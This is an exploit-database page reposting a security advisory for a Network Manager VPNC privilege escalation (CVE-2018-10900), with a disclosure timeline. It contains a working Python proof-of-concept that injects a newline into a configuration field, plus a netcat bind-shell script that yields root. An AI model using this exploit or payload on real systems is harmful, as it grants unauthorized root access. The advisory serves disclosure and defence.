0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Network Manager VPNC - Privilege Escalation (CVE-2018-10900) Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc CVE: CVE-2018-10900 Author: Denis Andzakovic Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc Affected Software: Network Manager VPNC a 1.2.4 --[ Description The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. --[ Privilege Escalation When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file. The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter. import dbus con = { 'vpn':{ 'service-type':'org.freedesktop.NetworkManager.vpnc', 'data':{ 'IKE DH Group':'dh2', 'IPSec ID':'testgroup', 'IPSec gateway':'gateway', 'IPSec secret-flags':'4', 'Local Port':'0', 'NAT Traversal Mode': 'natt', 'Perfect Forward Secrecy': 'server', 'Vendor': 'cisco', 'Xauth password-flags': '4', 'Xauth username': "username\nPassword helper /tmp/test", 'ipsec-secret-type': 'unused', 'xauth-password-type': 'unused' } }, 'connection':{ 'type':'vpn', 'id':'vpnc_test', }, 'ipv4':{'method':'auto'}, 'ipv6':{'method':'auto'} } bus = dbus.SystemBus() proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings") settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings") settings.AddConnection(con) The above results in the following configuration being passed to the vpnc process when the connection is initialized: Debug 0 Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4 Cisco UDP Encapsulation Port 0 Local Port 0 IKE DH Group dh2 Perfect Forward Secrecy server Xauth username username Password helper /tmp/test IPSec gateway gateway IPSec ID testgroup Vendor cisco NAT Traversal Mode natt The following figure details the complete privilege escalation attack. doi@ubuntu:~$ cat << EOF > /tmp/test > #!/bin/bash > mkfifo pipe > nc -k -l -p 8080 < pipe | /bin/bash > pipe > EOF doi@ubuntu:~$ python vpnc_privesc.py doi@ubuntu:~$ nmcli connection NAME UUID TYPE DEVICE Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3 vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3 doi@ubuntu:~$ nmcli connection up vpnc_test ^Z [1]+ Stopped nmcli connection up vpnc_test doi@ubuntu:~$ nc -vv 127.0.0.1 8080 Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded! id uid=0(root) gid=0(root) groups=0(root) --[ Timeline 11/07/2018 - Advisory sent to security@gnome.org 13/07/2018 - Acknowledgement from Gnome security 20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day 21/07/2018 - Network Manager VPNC 1.2.6 released 21/07/2018 - Advisory released --[ About Pulse Security Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services. W: https://pulsesecurity.co.nz E: info at pulsesecurity.co.nz # 0day.today [2024-12-27] #